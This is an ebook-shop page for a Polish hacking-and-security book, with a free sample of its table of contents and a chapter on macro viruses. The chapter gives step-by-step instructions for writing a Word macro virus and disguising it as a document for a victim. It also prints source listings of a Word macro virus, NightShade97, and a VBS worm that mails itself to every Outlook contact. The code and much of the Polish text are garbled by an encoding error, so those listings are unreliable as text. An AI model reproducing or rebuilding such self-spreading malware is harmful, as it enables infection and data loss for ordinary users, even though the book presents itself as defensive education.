Cyfroteka.pl

klikaj i czytaj online

Cyfro
Czytomierz
00096 009194 10485310 na godz. na dobę w sumie
Nie tylko wirusy. Hacking, cracking, bezpieczeństwo Internetu. Wydanie II - książka
Nie tylko wirusy. Hacking, cracking, bezpieczeństwo Internetu. Wydanie II - książka
Autor: Liczba stron: 352
Wydawca: Helion Język publikacji: polski
ISBN: 83-7361-288-2 Data wydania:
Lektor:
Kategoria: ebooki >> komputery i informatyka >> hacking >> bezpieczeństwo www
Porównaj ceny (książka, ebook, audiobook).

Powszechnie znanym zagrożeniem dla internautów są wirusy. Jednak to nie wszystko -- użytkownikom sieci zagrażają hakerzy, programy szpiegujące i inne pułapki, o których istnieniu wielu ludzi nawet nie wie. Niebezpieczeństwo wynikające z korzystania z sieci można znacznie ograniczyć, wiedząc, na czym polega jego natura. Nie od dziś wiadomo, że jednym z najskuteczniejszych sposobów na różnych napastników jest stosowanie ich własnej broni. Należy więc poznać metody ich działania i podjąć odpowiednie kroki zapobiegawcze.

Książka 'Nie tylko wirusy. Hacking, cracking, bezpieczeństwo Internetu. Wydanie II' przedstawia niemal wszystkie niebezpieczeństwa czyhające na internautów. Opisuje rodzaje wirusów i sposoby ich działania oraz techniki i narzędzia, jakimi posługują się hakerzy. Zawiera omówienie tych elementów systemów operacyjnych, które są najbardziej podatne na ataki, oraz informacje, jak im zapobiec.

Jeśli chcesz wiedzieć, jak obronić się przed sieciowymi pułapkami,
przeczytaj tę książkę.

Znajdź podobne książki Ostatnio czytane w tej kategorii

Darmowy fragment publikacji:

Nie tylko wirusy. Hacking, cracking, bezpieczeñstwo Internetu. Wydanie II Autor: Andrzej Dudek ISBN: 83-7361-288-2 Format: B5, stron: 352 Powszechnie znanym zagro¿eniem dla internautów s¹ wirusy. Jednak to nie wszystko — u¿ytkownikom sieci zagra¿aj¹ hakerzy, programy szpieguj¹ce i inne pu³apki, o których istnieniu wielu ludzi nawet nie wie. Niebezpieczeñstwo wynikaj¹ce z korzystania z sieci mo¿na znacznie ograniczyæ, wiedz¹c, na czym polega jego natura. Nie od dziġ wiadomo, ¿e jednym z najskuteczniejszych sposobów na ró¿nych napastników jest stosowanie ich w³asnej broni. Nale¿y wiêc poznaæ metody ich dzia³ania i podj¹æ odpowiednie kroki zapobiegawcze. Ksi¹¿ka „Nie tylko wirusy. Hacking, cracking, bezpieczeñstwo Internetu. Wydanie II” przedstawia niemal wszystkie niebezpieczeñstwa czyhaj¹ce na internautów. Opisuje rodzaje wirusów i sposoby ich dzia³ania oraz techniki i narzêdzia, jakimi pos³uguj¹ siê hakerzy. Zawiera omówienie tych elementów systemów operacyjnych, które s¹ najbardziej podatne na ataki, oraz informacje, jak im zapobiec. • Wirusy polimorficzne i makrowirusy • S³abe punkty systemów Windows • W³amania do systemów Linux • Sposoby maskowania obecnoġci hakera w systemie • Rodzaje ataków hakerskich Jeġli chcesz wiedzieæ, jak obroniæ siê przed sieciowymi pu³apkami, przeczytaj tê ksi¹¿kê IDZ DO IDZ DO PRZYK£ADOWY ROZDZIA£ PRZYK£ADOWY ROZDZIA£ SPIS TREĎCI SPIS TREĎCI KATALOG KSI¥¯EK KATALOG KSI¥¯EK KATALOG ONLINE KATALOG ONLINE ZAMÓW DRUKOWANY KATALOG ZAMÓW DRUKOWANY KATALOG TWÓJ KOSZYK TWÓJ KOSZYK DODAJ DO KOSZYKA DODAJ DO KOSZYKA CENNIK I INFORMACJE CENNIK I INFORMACJE ZAMÓW INFORMACJE ZAMÓW INFORMACJE O NOWOĎCIACH O NOWOĎCIACH ZAMÓW CENNIK ZAMÓW CENNIK CZYTELNIA CZYTELNIA FRAGMENTY KSI¥¯EK ONLINE FRAGMENTY KSI¥¯EK ONLINE Wydawnictwo Helion ul. Chopina 6 44-100 Gliwice tel. (32)230-98-63 e-mail: helion@helion.pl Spis treści Od Wydawcy...................................................9................................... 9 Przedmowa do wydania drugiego ...................................................9... 11 Część I Wirusy ...................................................r........................13 Zamiast wstępu...................................................9............................ 15 Rozdział 1. Wirusy polimorficzne ...................................................9..................... 17 MtE — Mutation Engine ...................................................n.............................................. 20 TPE — TridenT Polymorphic Engine ...................................................n.......................... 22 VCS-TPE — przykład wirusa polimorficznego korzystającego z TridenT Polymorphic Engine...................................................n.................................. 23 Inne znane generatory polimorficzne ...................................................n........................... 33 Jak to działa? ...................................................n...................................................n............. 34 Rozdział 2. Automatyczne narzędzia do tworzenia wirusów ................................. 47 Virus Construction Set — VCS...................................................n.................................... 48 Instant Virus Production Kit — IVP ...................................................n............................ 48 Virus Creation 2000 — VC2000 ...................................................n.................................. 51 Virus Creation Laboratory VCL...................................................n................................... 53 Rozdział 3. Makrowirusy...................................................9................................. 61 Wirusy VBS ...................................................n...................................................n.............. 67 Rozdział 4. Robaki internetowe...................................................9....................... 71 Love Letter ...................................................n...................................................n................ 71 MyDoom ...................................................n...................................................n...................73 Poczta...................................................n...................................................n.................. 73 Załączniki...................................................n...................................................n............ 76 Instalacja w systemie...................................................n.............................................. 80 Inne sztuczki ...................................................n...................................................n....... 81 Rozdział 5. Narzędzia...................................................9...................................... 83 AUTOMATED TOOLS...................................................n............................................... 83 DOCUMENT MACRO VIRUSES ...................................................n.............................. 83 ENGINES...................................................n...................................................n..................84 ROZSYŁACZ ...................................................n...................................................n........... 84 6 Nie tylko wirusy. Hacking, cracking, bezpieczeństwo Internetu SOURCE ...................................................n...................................................n...................84 VCS-PE ...................................................n...................................................n..................... 85 VCS-TPE ...................................................n...................................................n..................85 VIRUS ZINES ...................................................n...................................................n.......... 85 Część II Pecet i MS Windows ...................................................r...87 Rozdział 6. Hasło zabezpieczające SETUP komputera ......................................... 89 Rozdział 7. Pliki PWL ...................................................9..................................... 97 Rozdział 8. Microsoft Windows NT/2000 ...................................................9...... 101 Łamanie haseł...................................................n...................................................n.......... 101 Odczytywanie zawartości partycji NTFS z poziomu DOS-a......................................... 104 Jak może się skończyć pozostawienie użytkownikom zbyt dużych uprawnień? ........... 105 Polecenie NET..................................................n...................................................n.......... 106 NULL SESSION ...................................................n...................................................n..... 111 Samodzielne wykorzystanie NULL SESSION...................................................n........... 114 Część III Internet ...................................................r....................119 Rozdział 9. Prehistoria...................................................9.................................. 121 Hasła...................................................n...................................................n........................ 121 Smuga cienia ...................................................n...................................................n........... 123 Finger ...................................................n...................................................n................ 125 Katalogi zawierające kopie zapasowe ...................................................n........................ 126 Shadow na Linuksie (z dostępem fizycznym do komputera) ........................................ 127 NIS/NIS+/YP ...................................................n...................................................n.......... 129 Crack ...................................................n...................................................n....................... 130 Przykład użycia ...................................................n...................................................n. 134 John the Ripper ...................................................n...................................................n....... 136 Tryb prosty...................................................n...................................................n........ 137 Tryb słownikowy ...................................................n................................................. 137 Tryb inkrementacji ...................................................n............................................... 138 Tryb zewnętrzny...................................................n...................................................n 139 Sami piszemy crackera ...................................................n............................................... 142 Jak się zabezpieczyć? ...................................................n................................................. 144 Stosowanie pliku shadow ...................................................n..................................... 144 Zasada ograniczonego zaufania...................................................n............................ 146 Właściwa polityka ...................................................n................................................ 146 RLogin ...................................................n...................................................n.................... 147 Katalogi typu World Exportable...................................................n................................. 148 Narzędzia...................................................n...................................................n................. 150 SimpleCrack...................................................n...................................................n...... 150 Rozdział 10. Historia ...................................................9...................................... 151 Maskowanie obecności hakera w systemie...................................................n................. 151 Kilka zasad „bezpiecznej pracy” ...................................................n.......................... 151 Dzienniki zdarzeń (logi)...................................................n....................................... 154 Inne typy dzienników zdarzeń...................................................n.............................. 157 Spis treści 7 Tylne drzwi, czyli „wejścia awaryjne” ...................................................n....................... 158 Łamanie haseł ...................................................n...................................................n... 158 Plik .rhosts..................................................n...................................................n.......... 158 Dodatkowy użytkownik ...................................................n....................................... 158 Dodatkowy program typu SUID ...................................................n.......................... 158 Dodatkowa usługa w /etc/services..................................................n......................... 159 Dodatkowa pozycja w /etc/aliases...................................................n........................ 160 Zmiana kodu źródłowego programu ...................................................n.................... 161 Biblioteki...................................................n...................................................n........... 163 Kernel...................................................n...................................................n................ 163 Sumy kontrolne plików ...................................................n........................................ 163 Crontab...................................................n...................................................n.............. 166 /dev/kmem z możliwością zapisu i odczytu ...................................................n......... 167 Dodatkowy moduł...................................................n................................................ 167 Rootkit ...................................................n...................................................n.............. 168 Sami piszemy prosty moduł LKM...................................................n.............................. 168 Sniffing...................................................n...................................................n.................... 171 SSH/OPENSSH ...................................................n...................................................n 175 IP-Spoofing ...................................................n...................................................n............. 175 Sami piszemy sniffera ...................................................n................................................ 177 Powtórka z podstawówki ...................................................n..................................... 177 Model odniesienia OSI/ISO ...................................................n................................. 177 Narzędzia ...................................................n...................................................n.......... 192 Rozdział 11. Wczoraj ...................................................9...................................... 193 Skanery...................................................n...................................................n.................... 193 ISS SafeSuite ...................................................n...................................................n.... 193 Nessus ...................................................n...................................................n............... 197 NASL ...................................................n...................................................n................ 198 Odmiany skanowania portów...................................................n............................... 203 Nmap scanner by Fyodor ...................................................n..................................... 205 Z drugiej strony ...................................................n...................................................n. 209 Netcat ...................................................n...................................................n................ 210 Ataki typu buffer overflow ...................................................n......................................... 212 Ataki nadpisujące zmienne systemowe ...................................................n................ 226 Ataki zdalne ...................................................n...................................................n...... 227 Inne typy ataków buffer overflow ...................................................n........................ 231 Metody obrony ...................................................n...................................................n.. 232 Inne typy ataków ...................................................n...................................................n..... 234 Formatted String ...................................................n.................................................. 234 Cross-Site Scripting i HTML Injection ...................................................n................ 236 Ataki z wykorzystaniem zmiennych systemowych ................................................. 239 Ataki z wykorzystaniem dowiązań symbolicznych (race conditions) ..................... 240 Ataki typu DOS...................................................n...................................................n. 241 Sami piszemy shellcode ...................................................n............................................. 241 Linux ...................................................n...................................................n................. 242 MS Windows..................................................n...................................................n...... 250 Rozdział 12. Dziś...................................................9............................................ 275 Zawartość CD-ROM-u ...................................................n............................................... 275 8 Nie tylko wirusy. Hacking, cracking, bezpieczeństwo Internetu Dodatki ...................................................r....................................277 Dodatek A Stan prawny, czyli co wolno, a czego nie wolno robić...................... 279 Dodatek B Krótka ściąga z Linuksa ...................................................9.............. 283 Symbole...................................................n...................................................n................... 283 Atrybuty pliku ...................................................n...................................................n......... 284 Polecenia ...................................................n...................................................n................. 284 Zmienne systemowe ...................................................n...................................................n 286 Pliki ...................................................n...................................................n......................... 286 Urządzenia...................................................n...................................................n...............287 Dodatek C Funkcje systemowe Linuksa — przewodnik..................................... 289 Numery funkcji ...................................................n...................................................n....... 289 Definicje typów (alfabetycznie) ...................................................n................................. 294 Definicje struktur (alfabetycznie) ...................................................n............................... 297 Argumenty funkcji systemowych i pliki, w których znajdują się kody źródłowe funkcji...................................................n......... 305 Dodatek D Bezpieczeństwo sieci Novell...................................................9........ 313 Dostęp do serwera ...................................................n...................................................n... 314 Metoda „na bezczelnego”...................................................n..................................... 314 Moduły BURGLAR.NLM i SETPWD.NLM...................................................n....... 318 Szukanie konta ...................................................n...................................................n........ 320 Podglądanie administratora ...................................................n........................................ 320 Zdalny dostęp do serwera ...................................................n........................................... 322 Zgadywanie haseł (3.xx) ...................................................n............................................ 324 Praca na dowolnym koncie (3.xx) ...................................................n.............................. 328 Maskowanie konta włamywacza w systemie ...................................................n............. 329 Podsumowanie ...................................................n...................................................n........ 330 Źródła ...................................................9........................................ 333 Skorowidz ...................................................9.................................. 335 Rozdział 3. Makrowirusy Jeśli korzystasz z poczty elektronicznej lub przeglądasz grupy dyskusyjne, to pewnie zdarzyło Ci się kiedyś usłyszeć o przesyłce, która po otwarciu powoduje skasowanie wszystkich danych na twardym dysku lub wykonuje inne nieprzyjemne rzeczy. Właśnie takie pogłoski o liście z tytułem GOODTIMES krążyły masowo jakiś czas temu w sieci America On-Line. Stało się to początkiem dyskusji na temat: czy komputer można zara- zić wirusem przez same przeczytanie dokumentu? Po dokładnym przeanalizowaniu wszystkich za i przeciw oraz po sprawdzeniu dziesiątek przykładów wszystkie Wielkie Autorytety doszły do wniosku, że poza sytuacjami zdegenerowanymi (koń trojański w postaci podmienionego sterownika ANSI, źle skonfigurowany program do odczytu poczty) zarażanie poprzez przeczytanie pliku nie jest możliwe. Po czym znana skądinąd firma M. wypuściła na rynek nową wersję pakietu Office z rozbudowanym systemem makropoleceń i jak grzyby po deszczu zaczęły powstawać wirusy przenoszone w doku- mentach, które ochrzczono wspólną nazwą DMV (Document Macro Virus — tak nazy- wał się pierwszy z serii). Spowodowało to początkowo panikę porównywalną prawie z pamiętnym Michałem Aniołem. Jednak bliższe przyjrzenie się strukturze tego typu wirusów pozwoliło stwier- dzić, że są to stworki prymitywne i zarówno ich napisanie, jak i obrona przed nimi są jeszcze prostsze niż w przypadku tradycyjnych wirusów. Sprawdziła się tu znana zasada, że im większą elastyczność ma mieć dany system, tym bardziej jest narażony na infekcje. Furtką do systemu dla wirusów w tym przypadku była możliwość modyfikowania zestawu makropoleceń szablonów Worda oraz fakt, że makropolecenia o pewnych nazwach wykonują się zawsze w określonych sytuacjach. I tak: Nazwa makra Uruchamia się podczas: AutoExec AutoNew AutoOpen AutoClose AutoExit Rozpoczęcia pracy z Wordem Tworzenia nowego dokumentu Otwierania dokumentu Zamykania dokumentu Kończenia pracy z Wordem 62 Część I ♦ Wirusy Mechanizm tworzenia wirusa jest więc bardzo prosty: 1. Tworzysz nowe makro o nazwie takiej jak jedna z powyższych (niektóre wirusy podpinają się również pod inne często wykonywane polecenia, takie jak Zapisz — nie uruchamiają się wtedy automatycznie, ale w momencie, kiedy użytkownik skorzysta z tego polecenia). 2. Wpisujesz do niego kod wirusa. 3. Jako zawartość dokumentu wpisujesz np. treść łańcuszka św. Antoniego. 4. Zapisujesz plik jako Word Template, ale z nazwą *.DOC — żeby nie wzbudzać podejrzeń. 5. Przesyłasz (lub zanosisz na dyskietce) dokument do przyszłej ofiary z dopiskiem „przeczytaj to koniecznie”. Kod wirusa składa się z takich oto części: 1. Sprawdzenie, czy wirusa nie ma już w NORMAL.DOT. 2. Jeśli nie ma, to wirus kopiuje się do tego szablonu. 3. Sprawdzenie, czy makro jest obecne w aktywnym dokumencie. Jeśli nie jest, to wirus zmienia jego typ, zapisując go jako szablon Worda. Zachowuje jednak rozszerzenie DOC, aby nie wzbudzać podejrzeń. 4. Powielenie się wirusa do nowo utworzonego szablonu. 5. Przy odpowiednich warunkach (np. 13-tego w piątek) uaktywnia się powodując:  Skasowanie dysku C.  Zmianę nazw istniejących plików.  Przekopiowanie danych z dysku twardego zarażonego komputera na jakiś inny.  Wysłanie co ciekawszych plików (np. arkuszy Excela z tajnymi transakcjami firmy) pod wskazany adres e-mail.  Założenie hasła na plikach w zarażonym komputerze. No dobra, dosyć straszenia. Po prostu pisze komunikat CVEJ/G+H;QW CP i to wszystko. Napisanie wirusa na podstawie powyższego schematu nie powinno więc sprawiać większego kłopotu. Jak widać poniżej, listing kodu zajmuje niewiele miejsca i nie ma w sobie jakichś skomplikowanych funkcji: 4 /6TGħèOCMTC /8LGUVY[FTWMQYCPCCIQFæ 4 /,QGNC//E0COCT[ŌLGIQVYÎTE[9U[UVMKGMQOGPVCTG 4 /RQEJQFæQFPKGIQKUæRTGCWVQTCMUKæľMKV[NMQ 4 /RTGVđWOCEQPGPCLú[MRQNUMK 4 /2QPKľU[MQFFGOQPUVTWLGURGE[HKEPGCUVQUQYCPKGYKTWUC 4 /YFQMWOGPEKGWVYQTQP[ORTGCWVQOCV[EPGOCMTQRQNGEGPKC 4 /Y/KETQUQHV9QTFFNC9KPFQYU-QFLGUVY[MQP[YCP[C 4 /MCľF[OTCGOIF[FQMWOGPVLGUVCO[MCP[ 4 /6QOCMTQRQNGEGPKGLGUVCNGFYKGRT[MđCFGOKPKGY[MQPWLG Rozdział 3. ♦ Makrowirusy 63 4 /ľCFP[EJFGUVTWME[LP[EJE[PPQħEK 4 / GNGOVGIQMQFWLGUVYUMCCPKGKUVQVPGIQT[[MCYQEJTQPKG 4 /UQHVYCTGMVÎT[VQNGTWLGLú[MKOCMTQUCOQđCFWLæE[OKUKú 4 /FQNPQħEKCOK9URÎđEGUPGPCTúFKCFQY[MT[YCPKCYKTWUÎY 4 /PKGUæQDGEPKGYUVCPKGFQUVTGEVGIQV[RWYKTWUÎY 4 /CYKúMUQħèWľ[VMQYPKMÎYPCLFWLGUKúYUVCPKGDđQIKGL 4 /PKGħYKCFQOQħEKľGCITQľGPKGVQOQľGRQEJQFKè 4 /FQMWOGPVÎY 4 /9MNGLVGPMQFFQUCDNQPWOCMTQRQNGEGPKCYFQMWOGPEKG 4 /9QTFC CEJQYCLOCMTQRQNGEGPKGLCMQ#WVQ NQUG9GLFļ 4 /FQVGMUVWYIđÎYP[OQMPKG9QTFCKCEJQYCLVGPFQMWOGPV 4 /6GTCUMQRKWLRNKMCPQY[PCYKL8+475 1 1VYÎT 4 /8+475 1 CYKTWUY[MQPCUYGCFCPKG 4 /-QOWPKMCV[RQMCWLæRQUVúRY[MQP[YCPKCMQFW 4 /-QFLGUVWVYQTQP[ 4 /LQGNO GUMKOQEQO GEGODGT 4 / 5WD/#+0 VKVNG QEWOGPV/CETQ8KTWU /UI$QZ.KEúINQDCNPGOCMTCVKVNG 4 /5RTCYFļKNGOCMTINQDCNP[EJLGUVYVGLEJYKNK 4 /FGHKPKQYCP[EJ VQVCN QWPV/CETQU  RTGUGPV 4 /5RTCYFļE[#WVQ NQUGLGUVFGHKPKQYCPGLCMQOCMTQ 4 /INQDCNPG2QYCNCVQPCKFGPV[HKMCELúE[U[UVGOLGUV 4 /LWľCTCľQP[ +HVQVCN 6JGP (QTE[ENG6QVQVCN +H/CETQ0COG E[ENG #WVQ NQUG6JGP /UI$QZ/CMTQ#WVQ NQUGLGUVLWľCKPUVCNQYCPG Y014/#. 16VKVNG RTGUGPV  PF+H PF+H 4 /2QDKGTPCYúDKGľæEGIQFQMWOGPVW C9KPFQY0COG  #WVQ NQUG 4 /,GħNK#WVQ NQUGLGUEGVCOPKGOC 4 /VQMQRKWLIQFQ014/#. 16 +HRTGUGPV 6JGP /CETQ QR[C)NQDCN#WVQ NQUG /UI$QZ CKPHGMQYCđGO014/#. 16MQRKæOCMTC#WVQ NQUG YKTWUC /8VKVNG 64 Część I ♦ Wirusy 4 /6GPMQFCTCľCFQMWOGPVCMCľF[OTCGOMKGF[LGUV 4 /CO[MCP[2QYQFWLGVQLGIQTGRNKMCELúFQMCľFGIQFQMWOGPVW 4 /E[VCPGIQRTG9QTFC NUG 4 /,GħNK#WVQ NQUGLGUVLWľINQDCNP[OOCMTGOCRNKMPKG 4 /LGUVLGUEGCKPHGMQYCP[VQYKTWUCEJQYWLGDKGľæE[ 4 /FQMWOGPVLCMQUCDNQPCD[OQIđ[FQPKGIQD[èFQđæEQPG 4 /OCMTC 4 /5RTCYFļLGUEGTCE[#WVQ NQUGLGUVLWľYFQMWOGPEKG 4 /9V[ORT[RCFMWPKGVTGDCLWľURTCYFCèPCY[DQV[NMQ 4 /#WVQ NQUGOQľGQUCFKèOCMTQYFQMWOGPEKG RTGUGPV +H QWPV/CETQU   6JGP /UI$QZ#WVQ NQUGOCMTQYKTWULGUVLWľYV[OFQMWOGPEKG VKVNG RTGUGPV  PF+H 4 / CRKUDKGľæE[FQMWOGPVLCMQUCDNQP +HRTGUGPV6JGP (KNG5CXG#U(QTOCV /UI$QZ CRKUWLúDKGľæE[FQMWOGPVLCMQUCDNQPVKVNG  4 /+UMQRKWLFQPKGIQOCMTQ#WVQ NQUGUCDNQPW 4 /014/#. 16 /CETQ QR[)NQDCN#WVQ NQUGC /UI$QZ CKPHGMQYCđGODKGľæE[FQMWOGPVMQRKæOCMTC #WVQ NQUGYKTWUC /8VKVNG  PF+H PF+H 4 /2QRQYKGNGPKWUKúFQFQMWOGPVWKFQ014/#. 16 4 /Y[MQPWLGRQPKľU[MQF OQľGQPD[èFGUVTWME[LP[ 4 /LCMRQNGEGPKC-KNNKPYC[LP[LCM QPPGEVNWD 4 / QR[(KNGCNDQPKGOKGèľCFP[EJWDQEP[EJUMWVMÎY  /UI$QZ/CMTQYKTWUTQRTGUVTGPKđUKú6GTCY[MQPWLGLCMKħ MQF FQDT[!đ[!NWDQDQLúVP[!! VKVNG PF5WD W Wordzie 97 zmieniono język makropoleceń i można w nim pisać programy tylko w języku Visual Basic for Applications. Dlatego powyższy kod nie mógłby w nim być wykonywany. Mechanizm i zasady pozostają jednak bez zmian — jedynie za te same czynności odpowiadają inne funkcje. Ponadto nowością w stosunku do wersji poprzed- nich jest fakt, że programy pakietu Office 97 uprzedzają o możliwości istnienia makro- wirusów i standardowo proponują wyłączenie makroinstrukcji nowo otwieranego do- kumentu. Jest to jedyne zabezpieczenie — programy pakietu Office 97 nie zawierają w sobie skanera znanych wirusów i bardziej zaawansowanych narzędzi ochrony, ofero- wanych przez specjalistyczne pakiety antywirusowe. Rozdział 3. ♦ Makrowirusy 65 W momencie pisania pierwszego wydania tej książki jedynym znanym mi wirusem Worda 97 był NightShade97. Od tego czasu powstało ich bardzo wiele, wszystkie jednak działają według tego samego schematu. Poniżej znajduje się kod wirusa NightShade97. #VVTKDWVG8$A0COG0KIJV5JCFG 5WD#WVQ NQUG #VVTKDWVG#WVQ NQUG8$A GUETKRVKQP0KIJV5JCFG 1P TTQT)Q6Q0KIJV5JCFG 4 /2QEQTQDKèD[VPKJCđCU #RRNKECVKQP5ETGGP7RFCVKPI(CNUG #RRNKECVKQP KURNC[#NGTVUYF#NGTVU0QPG 9QTF$CUKE KUCDNG#WVQ/CETQU 1RVKQPU8KTWU2TQVGEVKQP(CNUG 5GV#EVKXG QE#EVKXG QEWOGPV 5GV)NQDCN QE0QTOCN6GORNCVG  QEWOGPV+PUVCNNGF(CNUG )NQDCN+PUVCNNGF(CNUG 4 /5RTCYFGPKGE[CMV[YP[FQMWOGPVLGUVLWľCKPHGMQYCP[ (QT+6Q#EVKXG QEWOGPV8$2TQLGEV8$ QORQPGPVU QWPV +H#EVKXG QEWOGPV8$2TQLGEV8$ QORQPGPVU + 0COG 0KIJV5JCFG6JGP  QEWOGPV+PUVCNNGF6TWG  PF+H 0GZV 4 /5RTCYFGPKGE[014/#. 16LGUVLWľCKPHGMQYCP[ (QT,6Q0QTOCN6GORNCVG8$2TQLGEV8$ QORQPGPVU QWPV +H0QTOCN6GORNCVG8$2TQLGEV8$ QORQPGPVU , 0COG 0KIJV5JCFG6JGP )NQDCN+PUVCNNGF6TWG  PF+H 0GZV 4 /,GħNKFQMWOGPVPKGLGUVCTCľQP[VQCRKUIQ 4 /LCMQUCDNQPKCTCļIQ +H QEWOGPV+PUVCNNGF(CNUG6JGP #RRNKECVKQP1TICPKGT QR[ 5QWTEG0QTOCN6GORNCVG(WNN0COG  GUVKPCVKQP#EVKXG QEWOGPV(WNN0COG 0COG0KIJV5JCFG 1DLGEVYF1TICPKGT1DLGEV2TQLGEV+VGOU #EVKXG QE5CXG#U (KNG0COG#EVKXG QE0COG (KNG(QTOCVYF(QTOCV6GORNCVG  PF+H 4 /4GRNKMCELCFQUCDNQPWINQDCNPGIQQKNGVGP 4 /PKGD[đCTCľQP[ 66 Część I ♦ Wirusy +H)NQDCN+PUVCNNGF(CNUG6JGP #RRNKECVKQP1TICPKGT QR[ 5QWTEG#EVKXG QEWOGPV(WNN0COG  GUVKPCVKQP0QTOCN6GORNCVG(WNN0COG 0COG0KIJV5JCFG 1DLGEVYF1TICPKGT1DLGEV2TQLGEV+VGOU 1RVKQPU5CXG0QTOCN2TQORV(CNUG  PF+H 4 /.QUQYGY[ħYKGVNGPKGMQOWPKMCVWQUYQKOKUVPKGPKW +H9GGM C[ 0QY +PV 4PF    6JGP #UUKUVCPV8KUKDNG6TWG 9KVJ#UUKUVCPV0GY$CNNQQP +EQPOUQ+EQP#NGTV 6GZV9QTF0KIJV5JCFGD[2[TQ=8$$? *GCFKPI#VVGPVKQP 5JQY  PF9KVJ  PF+H 4 /VGIQYUQDQVú FNCEGIQPKGYRKæVGM!!!! 4 /OKGPKCO[JCUđQ +H9GGM C[ 0QY #PF C[ 0QY 6JGP +H#EVKXG QE*CU2CUUYQTF(CNUG6JGP #EVKXG QE2CUUYQTF0KIJV5JCFG  PF+H  PF+H #RRNKECVKQP KURNC[#NGTVUYF#NGTVU#NN 0KIJV5JCFG PF5WD Próba otworzenia zainfekowanego dokumentu powoduje pojawienie się komunikatu: Pozwolenie na włączenie makr powoduje infekcję. Objawia się to między innym poja- wieniem się makra AutoClose. Rozdział 3. ♦ Makrowirusy 67 Co jakiś czas przy zamykaniu okien wirus się nam przedstawia w taki sposób: Wirusy VBS Microsoft i inni producenci oprogramowania biurowego poradzili sobie dość szybko z wi- rusami DMV, blokując lub ograniczając działanie makropoleceń i języka Visual Basic for Applications. Jak to jednak bywa w naturze, puste miejsce zostało szybko wypełnione przez jeszcze szybciej rozprzestrzeniające się makrowirusy, wykorzystujące internet i język VBS — domyślny język skryptowy sytemu Windows. VBS został kiedyś nazwany rajem dla twórców wirusów. Jest w tym trochę prawdy, ten następca przestarzałych, związanych jeszcze z DOS-em plików *.bat miał być wy- godnym narzędziem, automatyzującym czynności administracyjne systemu Windows. Narzędzie jest faktycznie dość wygodne (choć już widzę grymas skrzywienia na twarzy wszystkich wychowanych na C lub C++), jednak jak to zwykle bywa, wygoda bardzo rzadko idzie w parze z bezpieczeństwem a twórcy tego języka pozostawili momentami zbyt dużą swobodę programistom. Aby napisać wirusa w języku VBS, nie trzeba znać zbytnio systemu Windows. Nie ma potrzeby posiadania dokładniejszej wiedzy na temat działania wirusów a nawet nie trzeba koniecznie umieć programować w tym języku. Może tylko trzeba wiedzieć, co znaczy KH, a co HQT. 68 Część I ♦ Wirusy O ile od pomysłu na wirusa „tradycyjnego”:  Zainfekuj boot-sektor     Sprawdź, czy są przejęte odpowiednie przerwania, a jeśli nime, to je przechwyć Zastosuj techniki stealth do zamaskowania swojej obecności w systemie Doklej następną wersję wirusa (najlepiej zmutowaną) do pliku *.exe Uaktywnij się, jeśli zaistnieją odpowiednie warunki do jego realizacji musiało upłynąć wiele godzin żmudnego kodowania, a każdy z pod- punktów odpowiadał kilkudziesięciu czy kilkuset instrukcjom asemblera, o tyle pomysł na wirusa VBS:       Pobierz nazwę folderu systemowego Windows do zmiennej Pobierz nazwę wykonywanego skryptu do zmiennej Przekopiuj plik do folderu systemowego Utwórz obiekt aplikacji Outlook Utwórz obiekt Messaging Application Programming Interface (systemu dostępu do poczty elektronicznej przez programistów z tworzonych aplikacji) Dla wszystkich list w książce adresowej i dla wszystkich pozycji na liście:  utwórz nową wiadomość e-mail  ustaw adresata nowej wiadomości na nazwę z książki adresowej  ustaw temat wiadomości  ustaw treść wiadomości  dodaj jako załącznik plik wirusa z folderu systemowego Windows  wyślij wiadomość poprzez program Outlook  Wyczyść zmienne i zakończ skrypt nie wymaga praktycznie żadnego nakładu pracy programistycznej, a każda z pozycji schematu działania wirusa odpowiada prawie w stosunku 1:1 konkretnej instrukcji VBS. Otrzymany efekt to wirus rozsyłający swoje kopie pod wszystkie adresy e-mail znaj- dujące się w książce adresowej Outlooka. 1P TTQT4GUWOG0GZV KHOUIDQZ  KGēFQDT[6WYKTWU41 5;Đ# XDPGYNKPG2QCOMPKúEKWVGIQ QMKGPMCTQGħNúUKúFQYU[UVMKEJ6YQKEJPCLQO[EJXDPGYNKPG KúMWLú XD[GUPQECPEGN XD[GUVJGP 5GVQDKGMV TGCVG1DLGEV 5ETKRVKPI(KNG5[UVGO1DLGEV 5GVMCVCNQIQDKGMV)GV5RGEKCN(QNFGT  5GVRNKMQDKGMV)GV(KNG 95ETKRV5ETKRV(WNN0COG RNKM QR[ MCVCNQI 4QU[NCEXDU UGVQWVNQQM95ETKRV TGCVG1DLGEV 1WVNQQM#RRNKECVKQP UGVOCRKQWVNQQM)GV0COG5RCEG /#2+ HQTNVQOCRK#FFTGUU.KUVU QWPV UGVCOCRK#FFTGUU.KUVU N Rozdział 3. ♦ Makrowirusy 69 HQTRQ[ELCVQC#FFTGUU PVTKGU QWPV CFTGUCVC#FFTGUU PVTKGU RQ[ELC UGVRQEVCQWVNQQM TGCVG+VGO  RQEVC4GEKRKGPVU#FF CFTGUCV RQEVC5WDLGEV6WYKTWU4QU[đCE RQEVC$QF[XDPGYNKPG GħèFQUVCđGħYđCħPKGYKTWUC4QU[đCE7TWEJQO CđæEPKMLGħNKEJEGUIQTQGUđCèFCNGL RQEVC#VVCEJOGPVU#FF MCVCNQI TQU[NCEXDU RQEVC5GPF PGZV PGZV 5GVQWVNQQM0QVJKPI 5GVOCRK0QVJKPI OUIDQZ5MQēE[đGOTQU[đCPKGXDPGYNKPG KúMWLú Trzeba przyznać, że w konkursie na najmniej skomplikowanego i najprostszego do napi- sania wirusa w dowolnym języku programowania ten miałby największe szanse na wygraną. Jest w pełni funkcjonalnym, samoreplikującym się tworem, wymaga jedynie otwarcia przez adresata załącznika do dalszego rozprzestrzeniania się (co więcej, progra- my pocztowe w systemie Windows miały kilka dziur pozwalających na uruchomienie kodu VBS w trakcie czytania wiadomości e-mail nawet bez konieczności otwierania załączników). Typowym i chyba najbardziej popularnym przedstawicielem wirusów VBS był wirus I Love You, dokładniej opisany w rozdziale 4.
Pobierz darmowy fragment (pdf)

Gdzie kupić całą publikację:

Nie tylko wirusy. Hacking, cracking, bezpieczeństwo Internetu. Wydanie II
Autor:

Opinie na temat publikacji:


Inne popularne pozycje z tej kategorii:


Czytaj również:


Prowadzisz stronę lub blog? Wstaw link do fragmentu tej książki i współpracuj z Cyfroteką: